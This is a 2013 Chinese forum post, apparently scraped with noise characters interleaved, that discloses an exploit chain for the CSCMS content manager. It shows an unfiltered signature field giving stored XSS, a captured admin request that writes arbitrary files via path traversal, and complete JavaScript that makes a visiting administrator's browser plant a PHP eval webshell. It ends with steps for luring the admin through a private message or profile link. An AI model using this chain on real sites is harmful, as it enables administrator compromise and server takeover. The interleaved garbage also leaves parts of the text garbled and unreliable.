|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
9 P8 V8 R' |2 l! Z) r0 |4 S% W官网已经修补了,所以重新下了源码9 {# u1 m3 X" t% w. l
因为 后台登入 还需要认证码 所以 注入就没看了。
: s) B! p4 b4 q) n存在 xss
% @. ^. z/ I% }漏洞文件 user/member/skin_edit.php. `, ~0 T" [' x& _
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
; A: S# n) ~# H8 O
7 N* s7 m* E0 p' d# }9 N</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
0 H Q* G1 |2 W
, P- Y+ U) {- O A4 m</textarea></td></tr>
* u- M# Q$ F" Z8 i! d4 U5 Q 8 ~7 A. ]: v" u: Y7 \) r
user/do.php 8 q u U: I6 J
3 H; E3 r) ^* f3 M6 ]" W& H
# V8 N, P% @7 y1 I7 Z! n# o* P! _
if($op=='zl'){ //资料
: C& K5 \' v6 z: T F
% ]0 ?" _& K3 }- K$ B if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
5 H# ~& c, ]: B4 M2 L2 i0 F exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
1 W0 E7 v' Z" Q9 C( m7 V
4 \" ?6 ?2 V- z3 X $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
1 Y) o+ V8 C# y: n6 `8 v ' c/ [* l8 R% S2 T' H
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'# S+ s' j4 U7 y: `8 Q
where CS_Name='".$cscms_name."'"; m' R: d! G) N" t) @) K
' r. j4 P8 r1 O) X9 i9 V/ d
if($db->query($sql)){
. h8 X* Q3 }7 n+ Q $ w- c J# D9 k
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
4 t6 u( W7 E# V - n0 z# s/ A G1 \, j
}else{. ]1 s5 s8 A2 w/ i E3 ]5 T
; _' @2 h% p; x* \
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
f1 F3 O) \& R% u
; h4 X- z: _$ O/ L% S }4 V% y2 M, M i7 x% M+ i4 G
* h/ R$ c( b: ~) X
) o& N5 F7 x/ z/ r) I" @8 L4 V$ b1 L没有 过滤导致xss产生。$ C) L: z' [/ x1 Y0 A& @8 ^
后台 看了下 很奇葩的是可以写任意格式文件。。+ E0 z, z1 u1 L7 `
抓包。。+ ~& a4 Q/ v) R8 d; E1 H
" @* u4 n+ X" o7 _4 o; V. S
# s' q6 ?7 x) f- d本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1& X2 r5 a; F& Z* d& ~. Z2 b
: N' `5 i5 `, L, I
Accept: text/html, application/xhtml+xml, */** H% _! R$ t c( q7 Z2 K" O( c
; h9 B2 L& v8 KReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php/ V i, v1 B0 \7 k
$ x9 F$ U5 g* o0 S! @
Accept-Language: zh-CN7 c9 A6 i) g' Y7 L0 P4 e6 p
, s) {% S) C# I1 ]! s1 U* FUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
4 G/ Z9 V: c0 S8 T/ v) G2 v ; r$ ^* }; n. y* Q
Content-Type: application/x-www-form-urlencoded5 o/ D0 Y' J( ?, G4 E
$ G- y- y) v7 P2 j U# _
Accept-Encoding: gzip, deflate
: X) x6 L( C2 E! M% ]& g3 ] R4 _4 n/ ` 6 q5 a6 L# M* M
Host: 127.0.0.1# `# z2 N. K8 U m Q$ N* c
2 J" L7 Q" t8 ]/ s
Content-Length: 38
" K/ G" z4 f5 p+ f- r
7 d2 I( S% i$ g% H0 x4 y ~DNT: 1
9 ^* F" g( g" V: C& b* z : V% p M* b, q3 h
Connection: Keep-Alive
8 g% a" N9 n! C
$ a2 N4 j" y0 X% f' m% cCache-Control: no-cache
: N7 q7 R1 f2 t$ N! S6 ~ ' ~3 Q. L# c u( T1 y- u. A. n7 z
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594/ d& o! s8 y. p9 C; V i6 j( j
1 ^: F- O2 k* C5 i/ Z
: s# }8 [8 z0 H, o1 _) W
name=aaa.php&content=%3Cs%3E%3Ca%25%3E8 ~2 `% M. f) L$ y+ f
) [9 }( n; T5 v" F+ D$ Q
' Q' y% F. s7 L% `& V8 B7 P! q+ H! t
于是 构造js如下。 ?) g. J* g) z; Q! a/ e, M; R( m
7 ?' O: S# Y$ J3 a; D7 X3 Z本帖隐藏的内容<script>
5 k& o9 @1 | G& R6 C. tthisTHost = top.location.hostname;
( L/ A# q5 g6 i4 X
1 }: ^! M Z* j, JthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
( Q: h" K! a" E6 Z* u' I; N , x! b5 c3 ~" I
function PostSubmit(url, data, msg) { 5 q5 z0 \7 L \1 @1 c; r0 f, ]
var postUrl = url;
7 ~7 x3 Z8 O0 e1 H( t, ?: n0 P5 d
$ I/ A& |6 `! e7 s, a var postData = data;
3 O' J$ i' E; c) ?: ^! j' ] var msgData = msg;
( R9 ]0 q8 i, i1 W4 O/ i var ExportForm = document.createElement("FORM");
7 M- \- g- Y; I4 e% \" U" n+ g document.body.appendChild(ExportForm); 0 b4 Q. ]( W0 l6 o6 M! o
ExportForm.method = "POST";
4 u8 J6 f" {# K: f9 ^ ^0 d var newElement = document.createElement("input"); . \) |6 c, G" [% |2 y5 v, Q ]: H5 q
newElement.setAttribute("name", "name");
5 F* ~+ m- R- e Q! L- I; e newElement.setAttribute("type", "hidden");
9 }4 D/ W6 i7 P var newElement2 = document.createElement("input"); , N- P! c$ N1 e$ W5 u" b8 P- @" X
newElement2.setAttribute("name", "content"); ! v m* p0 a% Z; ~3 Y1 e0 I
newElement2.setAttribute("type", "hidden");
: G% }1 b9 r6 Z8 b- f1 ?5 x8 t ExportForm.appendChild(newElement);
( c4 S3 I1 J2 q& F! w2 } ExportForm.appendChild(newElement2); # v" g1 Z" Y# P- ?8 j' u l
newElement.value = postData;
- S% x0 g$ I/ e# v# _' X newElement2.value = msgData;
: A# A1 Z4 e4 ~4 V6 ?7 Q ExportForm.action = postUrl;
% q. i# F0 X9 w: F$ h6 i2 n ExportForm.submit(); 5 N! Q- F- t( t& U4 M
};
- w& P: u. a0 F$ `/ G! N
) O6 M4 X7 a/ \+ T+ z0 f0 nPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");6 v, y/ g- V9 s+ z7 e+ c9 k R
$ h3 |2 B) ^# y2 q3 J. N</script>
, j2 ~% o7 i0 W
% q" B7 e% h" I; w/ U2 ^+ y: u" `4 F3 ^
$ t/ m2 l- O }1 t
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
( L! D5 Y; c$ U7 M$ D用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改); I" Z! b. W3 T \( t2 w
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
) o' Z4 U; ~: T0 j5 l& ^
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对